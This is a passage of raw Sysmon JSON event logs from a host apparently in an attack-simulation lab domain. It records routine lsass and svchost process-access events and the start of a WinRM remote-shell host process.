C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.254","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.254\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.254","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.284\r\nProcessGuid: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nProcessId: 4124\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1078-5F25-0000-002039280400}\r\nLogonId: 0x42839\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.284","ProcessGuid":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1078-5F25-0000-002039280400}","LogonId":"0x42839","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
